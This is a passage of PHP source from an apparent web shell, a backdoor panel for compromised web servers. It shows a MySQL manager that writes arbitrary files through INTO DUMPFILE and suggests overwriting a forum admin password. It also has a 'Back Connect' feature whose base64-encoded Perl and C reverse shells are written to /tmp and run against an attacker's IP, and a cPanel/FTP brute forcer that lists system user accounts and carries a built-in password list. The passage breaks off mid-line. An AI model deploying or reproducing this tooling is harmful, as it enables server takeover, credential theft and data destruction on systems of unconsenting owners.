666 666 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
667 667 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
668 668 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
669 669 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
670 670 p('</td></tr>');
671 671 $file_i++;
672 672 }
673 673 }
674 674 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
675 675 p('</form></table>');
676 676 } // end dir
677 677 elseif ($action == 'sqlfile') {
678 678 if ($doing == "mysqlupload") {
679 679 $file = $_FILES['uploadfile'];
680 680 $filename = $file['tmp_name'];
681 681 if (file_exists($savepath)) {
682 682 m('The goal file has already existed');
683 683 } else {
684 684 if (!$filename) {
685 685 m('Please choose a file');
686 686 } else {
687 687 $fp = @fopen($filename, 'r');
688 688 $contents = @fread($fp, filesize($filename));
689 689 @fclose($fp);
690 690 $contents = bin2hex($contents);
691 691 if (!$upname) $upname = $file['name'];
692 692 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
693 693 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
694 694 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
695 695 }
696 696 }
697 697 }
698 698 ?>
699 699 <script type="text/javascript">
700 700 function mysqlfile(doing){
701 701 if(!doing) return;
702 702 $('doing').value=doing;
703 703 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
704 704 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
705 705 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
706 706 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
707 707 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
708 708 $('mysqlfile').charset.value=$('dbinfo').charset.value;
709 709 $('mysqlfile').submit();
710 710 }
711 711 </script>
712 712 <?php
713 713 !$dbhost && $dbhost = 'localhost';
714 714 !$dbuser && $dbuser = 'root';
715 715 !$dbport && $dbport = '3306';
716 716 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
717 717 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
718 718 makehide('action', 'sqlfile');
719 719 p('<p>');
720 720 p('DBHost:');
721 721 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
722 722 p(':');
723 723 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
724 724 p('DBUser:');
725 725 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
726 726 p('DBPass:');
727 727 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
728 728 p('DBName:');
729 729 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
730 730 p('DBCharset:');
731 731 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
732 732 p('</p>');
733 733 formfoot();
734 734 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
735 735 p('<h2>Upload file</h2>');
736 736 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
737 737 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
738 738 p('<h2>Download file</h2>');
739 739 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
740 740 makehide('dbhost');
741 741 makehide('dbport');
742 742 makehide('dbuser');
743 743 makehide('dbpass');
744 744 makehide('dbname');
745 745 makehide('charset');
746 746 makehide('doing');
747 747 makehide('action', 'sqlfile');
748 748 p('</form>');
749 749 } elseif ($action == 'sqladmin') {
750 750 !$dbhost && $dbhost = 'localhost';
751 751 !$dbuser && $dbuser = 'root';
752 752 !$dbport && $dbport = '3306';
753 753 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
754 754 if (isset($dbhost)) {
755 755 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
756 756 }
757 757 if (isset($dbuser)) {
758 758 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
759 759 }
760 760 if (isset($dbpass)) {
761 761 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
762 762 }
763 763 if (isset($dbport)) {
764 764 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
765 765 }
766 766 if (isset($dbname)) {
767 767 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
768 768 }
769 769 if (isset($charset)) {
770 770 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
771 771 }
772 772 if ($doing == 'backupmysql' && $saveasfile) {
773 773 if (!$table) {
774 774 m('Please choose the table');
775 775 } else {
776 776 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
777 777 $table = array_flip($table);
778 778 $fp = @fopen($path, 'w');
779 779 if ($fp) {
780 780 $result = q('SHOW tables');
781 781 if (!$result) p('<h2>' . mysql_error() . '</h2>');
782 782 $mysqldata = '';
783 783 while ($currow = mysql_fetch_array($result)) {
784 784 if (isset($table[$currow[0]])) {
785 785 sqldumptable($currow[0], $fp);
786 786 }
787 787 }
788 788 fclose($fp);
789 789 $fileurl = str_replace(SA_ROOT, '', $path);
790 790 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
791 791 mysql_close();
792 792 } else {
793 793 m('Backup failed');
794 794 }
795 795 }
796 796 }
797 797 if ($insert && $insertsql) {
798 798 $keystr = $valstr = $tmp = '';
799 799 foreach ($insertsql as $key => $val) {
800 800 if ($val) {
801 801 $keystr.= $tmp . $key;
802 802 $valstr.= $tmp . "'" . addslashes($val) . "'";
803 803 $tmp = ',';
804 804 }
805 805 }
806 806 if ($keystr && $valstr) {
807 807 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
808 808 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
809 809 }
810 810 }
811 811 if ($update && $insertsql && $base64) {
812 812 $valstr = $tmp = '';
813 813 foreach ($insertsql as $key => $val) {
814 814 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
815 815 $tmp = ',';
816 816 }
817 817 if ($valstr) {
818 818 $where = base64_decode($base64);
819 819 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
820 820 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
821 821 }
822 822 }
823 823 if ($doing == 'del' && $base64) {
824 824 $where = base64_decode($base64);
825 825 $delete_sql = "DELETE FROM $tablename WHERE $where";
826 826 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
827 827 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
828 828 }
829 829 if ($tablename && $doing == 'drop') {
830 830 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
831 831 if (q("DROP TABLE $tablename")) {
832 832 m('Drop table of success');
833 833 $tablename = '';
834 834 } else {
835 835 m(mysql_error());
836 836 }
837 837 }
838 838 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
839 839 formhead(array('title' => 'MYSQL Manager'));
840 840 makehide('action', 'sqladmin');
841 841 p('<p>');
842 842 p('DBHost:');
843 843 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
844 844 p(':');
845 845 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
846 846 p('DBUser:');
847 847 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
848 848 p('DBPass:');
849 849 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
850 850 p('DBCharset:');
851 851 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
852 852 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
853 853 p('</p>');
854 854 formfoot();
855 855 ?>
856 856 <script type="text/javascript">
857 857 function editrecord(action, base64, tablename){
858 858 if (action == 'del') {
859 859 if (!confirm('Is or isn\'t deletion record?')) return;
860 860 }
861 861 $('recordlist').doing.value=action;
862 862 $('recordlist').base64.value=base64;
863 863 $('recordlist').tablename.value=tablename;
864 864 $('recordlist').submit();
865 865 }
866 866 function moddbname(dbname) {
867 867 if(!dbname) return;
868 868 $('setdbname').dbname.value=dbname;
869 869 $('setdbname').submit();
870 870 }
871 871 function settable(tablename,doing,page) {
872 872 if(!tablename) return;
873 873 if (doing) {
874 874 $('settable').doing.value=doing;
875 875 }
876 876 if (page) {
877 877 $('settable').page.value=page;
878 878 }
879 879 $('settable').tablename.value=tablename;
880 880 $('settable').submit();
881 881 }
882 882 </script>
883 883 <?php
884 884 // SQL
885 885 formhead(array('name' => 'recordlist'));
886 886 makehide('doing');
887 887 makehide('action', 'sqladmin');
888 888 makehide('base64');
889 889 makehide('tablename');
890 890 p($dbform);
891 891 formfoot();
892 892 // Data
893 893 formhead(array('name' => 'setdbname'));
894 894 makehide('action', 'sqladmin');
895 895 p($dbform);
896 896 if (!$dbname) {
897 897 makehide('dbname');
898 898 }
899 899 formfoot();
900 900 formhead(array('name' => 'settable'));
901 901 makehide('action', 'sqladmin');
902 902 p($dbform);
903 903 makehide('tablename');
904 904 makehide('page', $page);
905 905 makehide('doing');
906 906 formfoot();
907 907 $cachetables = array();
908 908 $pagenum = 30;
909 909 $page = intval($page);
910 910 if ($page) {
911 911 $start_limit = ($page - 1) * $pagenum;
912 912 } else {
913 913 $start_limit = 0;
914 914 $page = 1;
915 915 }
916 916 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
917 917 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
918 918 // get mysql server
919 919 $mysqlver = mysql_get_server_info();
920 920 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
921 921 $highver = $mysqlver > '4.1' ? 1 : 0;
922 922 // Show database
923 923 $query = q("SHOW DATABASES");
924 924 $dbs = array();
925 925 $dbs[] = '-- Select a database --';
926 926 while ($db = mysql_fetch_array($query)) {
927 927 $dbs[$db['Database']] = $db['Database'];
928 928 }
929 929 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
930 930 $tabledb = array();
931 931 if ($dbname) {
932 932 p('<p>');
933 933 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
934 934 if ($tablename) {
935 935 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
936 936 }
937 937 p('</p>');
938 938 mysql_select_db($dbname);
939 939 $getnumsql = '';
940 940 $runquery = 0;
941 941 if ($sql_query) {
942 942 $runquery = 1;
943 943 }
944 944 $allowedit = 0;
945 945 if ($tablename && !$sql_query) {
946 946 $sql_query = "SELECT * FROM $tablename";
947 947 $getnumsql = $sql_query;
948 948 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
949 949 $allowedit = 1;
950 950 }
951 951 p('<form action="' . $self . '" method="POST">');
952 952 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
953 953 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
954 954 makehide('tablename', $tablename);
955 955 makehide('action', 'sqladmin');
956 956 p($dbform);
957 957 p('</form>');
958 958 if ($tablename || ($runquery && $sql_query)) {
959 959 if ($doing == 'structure') {
960 960 $result = q("SHOW COLUMNS FROM $tablename");
961 961 $rowdb = array();
962 962 while ($row = mysql_fetch_array($result)) {
963 963 $rowdb[] = $row;
964 964 }
965 965 p('<table border="0" cellpadding="3" cellspacing="0">');
966 966 p('<tr class="head">');
967 967 p('<td>Field</td>');
968 968 p('<td>Type</td>');
969 969 p('<td>Null</td>');
970 970 p('<td>Key</td>');
971 971 p('<td>Default</td>');
972 972 p('<td>Extra</td>');
973 973 p('</tr>');
974 974 foreach ($rowdb as $row) {
975 975 $thisbg = bg();
976 976 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
977 977 p('<td>' . $row['Field'] . '</td>');
978 978 p('<td>' . $row['Type'] . '</td>');
979 979 p('<td>' . $row['Null'] . ' </td>');
980 980 p('<td>' . $row['Key'] . ' </td>');
981 981 p('<td>' . $row['Default'] . ' </td>');
982 982 p('<td>' . $row['Extra'] . ' </td>');
983 983 p('</tr>');
984 984 }
985 985 tbfoot();
986 986 } elseif ($doing == 'insert' || $doing == 'edit') {
987 987 $result = q('SHOW COLUMNS FROM ' . $tablename);
988 988 while ($row = mysql_fetch_array($result)) {
989 989 $rowdb[] = $row;
990 990 }
991 991 $rs = array();
992 992 if ($doing == 'insert') {
993 993 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
994 994 } else {
995 995 p('<h2>Update record in ' . $tablename . ' table »</h2>');
996 996 $where = base64_decode($base64);
997 997 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
998 998 $rs = mysql_fetch_array($result);
999 999 }
10001000 p('<form method="post" action="' . $self . '">');
10011001 p($dbform);
10021002 makehide('action', 'sqladmin');
10031003 makehide('tablename', $tablename);
10041004 p('<table border="0" cellpadding="3" cellspacing="0">');
10051005 foreach ($rowdb as $row) {
10061006 if ($rs[$row['Field']]) {
10071007 $value = htmlspecialchars($rs[$row['Field']]);
10081008 } else {
10091009 $value = '';
10101010 }
10111011 $thisbg = bg();
10121012 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
10131013 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
10141014 }
10151015 if ($doing == 'insert') {
10161016 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
10171017 } else {
10181018 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
10191019 makehide('base64', $base64);
10201020 }
10211021 p('</table></form>');
10221022 } else {
10231023 $querys = @explode(';', $sql_query);
10241024 foreach ($querys as $num => $query) {
10251025 if ($query) {
10261026 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
10271027 switch (qy($query)) {
10281028 case 0:
10291029 p('<h2>Error : ' . mysql_error() . '</h2>');
10301030 break;
10311031 case 1:
10321032 if (strtolower(substr($query, 0, 13)) == 'select * from') {
10331033 $allowedit = 1;
10341034 }
10351035 if ($getnumsql) {
10361036 $tatol = mysql_num_rows(q($getnumsql));
10371037 $multipage = multi($tatol, $pagenum, $page, $tablename);
10381038 }
10391039 if (!$tablename) {
10401040 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
10411041 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
10421042 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
10431043 $tablename = $matches[1][0];
10441044 }
10451045 $result = q($query);
10461046 p($multipage);
10471047 p('<table border="0" cellpadding="3" cellspacing="0">');
10481048 p('<tr class="head">');
10491049 if ($allowedit) p('<td>Action</td>');
10501050 $fieldnum = @mysql_num_fields($result);
10511051 for ($i = 0;$i < $fieldnum;$i++) {
10521052 $name = @mysql_field_name($result, $i);
10531053 $type = @mysql_field_type($result, $i);
10541054 $len = @mysql_field_len($result, $i);
10551055 p("<td nowrap>$name<br><span>$type($len)</span></td>");
10561056 }
10571057 p('</tr>');
10581058 while ($mn = @mysql_fetch_assoc($result)) {
10591059 $thisbg = bg();
10601060 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
10611061 $where = $tmp = $b1 = '';
10621062 foreach ($mn as $key => $inside) {
10631063 if ($inside) {
10641064 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
10651065 $tmp = ' AND ';
10661066 }
10671067 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
10681068 }
10691069 $where = base64_encode($where);
10701070 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
10711071 p($b1);
10721072 p('</tr>');
10731073 unset($b1);
10741074 }
10751075 tbfoot();
10761076 p($multipage);
10771077 break;
10781078 case 2:
10791079 $ar = mysql_affected_rows();
10801080 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
10811081 break;
10821082 }
10831083 }
10841084 }
10851085 }
10861086 } else {
10871087 $query = q("SHOW TABLE STATUS");
10881088 $table_num = $table_rows = $data_size = 0;
10891089 $tabledb = array();
10901090 while ($table = mysql_fetch_array($query)) {
10911091 $data_size = $data_size + $table['Data_length'];
10921092 $table_rows = $table_rows + $table['Rows'];
10931093 $table['Data_length'] = sizecount($table['Data_length']);
10941094 $table_num++;
10951095 $tabledb[] = $table;
10961096 }
10971097 $data_size = sizecount($data_size);
10981098 unset($table);
10991099 p('<table border="0" cellpadding="0" cellspacing="0">');
11001100 p('<form action="' . $self . '" method="POST">');
11011101 makehide('action', 'sqladmin');
11021102 p($dbform);
11031103 p('<tr class="head">');
11041104 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
11051105 p('<td>Name</td>');
11061106 p('<td>Rows</td>');
11071107 p('<td>Data_length</td>');
11081108 p('<td>Create_time</td>');
11091109 p('<td>Update_time</td>');
11101110 if ($highver) {
11111111 p('<td>Engine</td>');
11121112 p('<td>Collation</td>');
11131113 }
11141114 p('</tr>');
11151115 foreach ($tabledb as $key => $table) {
11161116 $thisbg = bg();
11171117 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
11181118 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
11191119 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
11201120 p('<td>' . $table['Rows'] . '</td>');
11211121 p('<td>' . $table['Data_length'] . '</td>');
11221122 p('<td>' . $table['Create_time'] . '</td>');
11231123 p('<td>' . $table['Update_time'] . '</td>');
11241124 if ($highver) {
11251125 p('<td>' . $table['Engine'] . '</td>');
11261126 p('<td>' . $table['Collation'] . '</td>');
11271127 }
11281128 p('</tr>');
11291129 }
11301130 p('<tr class=fout>');
11311131 p('<td> </td>');
11321132 p('<td>Total tables: ' . $table_num . '</td>');
11331133 p('<td>' . $table_rows . '</td>');
11341134 p('<td>' . $data_size . '</td>');
11351135 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
11361136 p('</tr>');
11371137 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
11381138 makehide('doing', 'backupmysql');
11391139 formfoot();
11401140 p("</table>");
11411141 fr($query);
11421142 }
11431143 }
11441144 }
11451145 tbfoot();
11461146 @mysql_close();
11471147 } //end sql backup
11481148 elseif ($action == 'backconnect') {
11491149 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
11501150 !$yourport && $yourport = '12345';
11511151 $usedb = array('perl' => 'perl', 'c' => 'c');
11521152 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
11531153 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
11541154 if ($start && $yourip && $yourport && $use) {
11551155 if ($use == 'perl') {
11561156 cf('/tmp/angel_bc', $back_connect);
11571157 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
11581158 } else {
11591159 cf('/tmp/angel_bc.c', $back_connect_c);
11601160 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
11611161 @unlink('/tmp/angel_bc.c');
11621162 $res = execute("/tmp/angel_bc $yourip $yourport &");
11631163 }
11641164 m("Now script try connect to $yourip port $yourport ...");
11651165 }
11661166 formhead(array('title' => 'Back Connect'));
11671167 makehide('action', 'backconnect');
11681168 p('<p>');
11691169 p('Your IP:');
11701170 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
11711171 p('Your Port:');
11721172 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
11731173 p('Use:');
11741174 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
11751175 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
11761176 p('</p>');
11771177 formfoot();
11781178 } //end backconnect window via NC
11791179 // Brute
11801180 elseif ($action == 'brute') {
11811181 formhead(array('title' => 'Brute Forcer'));
11821182 makehide('action', 'brute');
11831183 makehide('dir', $brute);
11841184 @ini_set('memory_limit', 1000000000000);
11851185 $connect_timeout = 5;
11861186 @set_time_limit(0);
11871187 $submit = $_REQUEST['submit'];
11881188 $users = $_REQUEST['users'];
11891189 $pass = $_REQUEST['passwords'];
11901190 $target = $_REQUEST['target'];
11911191 $option = $_REQUEST['option'];
11921192 $passlist = "0123456
11931193 01234567
11941194 012345678
11951195 0123456789
11961196 01234567890
11971197 123456
11981198 1234567
11991199 12345678
12001200 123456789
12011201 1234567890
12021202 111111
12031203 000000
12041204 222222
12051205 333333
12061206 444444
12071207 555555
12081208 666666
12091209 777777
12101210 888888
12111211 999999
12121212 123123
12131213 456456
12141214 789789
12151215 123321
12161216 456654
12171217 654321
12181218 7654321
12191219 87654321
12201220 987654321
12211221 0987654321
12221222 admin
12231223 administrator
12241224 admincp
12251225 cpanel
12261226 adminx
12271227 admins
12281228 password
12291229 passwords
12301230 passw0rd
12311231 p@ssw0rd
12321232 p@ssword
12331233 khongco
12341234 25251325
12351235 passw0rds";
12361236 if ($target == '') {
12371237 $target = 'localhost';
12381238 }
12391239 print " <div align='center'>
12401240 <form method='post' style='border: 1px solid #000000'><br><br>
12411241 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
12421242 <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
12431243 <div align='center'><br>
12441244 <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
12451245 <tr>
12461246 <td align='center'>
12471247 <b>Username</b></td>
12481248 <td>
12491249 <p align='center'>
12501250 <b>Password</b></td>
12511251 </tr>
12521252 </table>
12531253 <p align='center'>
12541254 <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
12551255 $i = 0;
12561256 while ($i < 60000) {
12571257 $line = posix_getpwuid($i);
12581258 if (!empty($line)) {
12591259 while (list($key, $vba_etcpwd) = each($line)) {
12601260 echo "" . $vba_etcpwd . "\n";
12611261 break;
12621262 }
12631263 }
12641264 $i++;
12651265 }
12661266 echo "
12671267 </textarea>
12681268 <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
12691269 <br>
12701270 <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
12711271 <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
12721272 </td></tr></table></td></tr></form><p align= 'left'>";
12731273 ?>
12741274 <?php
12751275 function ftp_check($host, $user, $pass, $timeout) {
12761276 $ch = curl_init();
12771277 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
12781278 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
12791279 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
12801280 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
12811281 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
12821282 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
12831283 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
12841284 $data = curl_exec($ch);
12851285 if (curl_errno($ch) == 28) {
12861286 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
12871287 exit;
12881288 } elseif (curl_errno($ch) == 0) {
12891289 p("<b>[ attack@vbateam.net
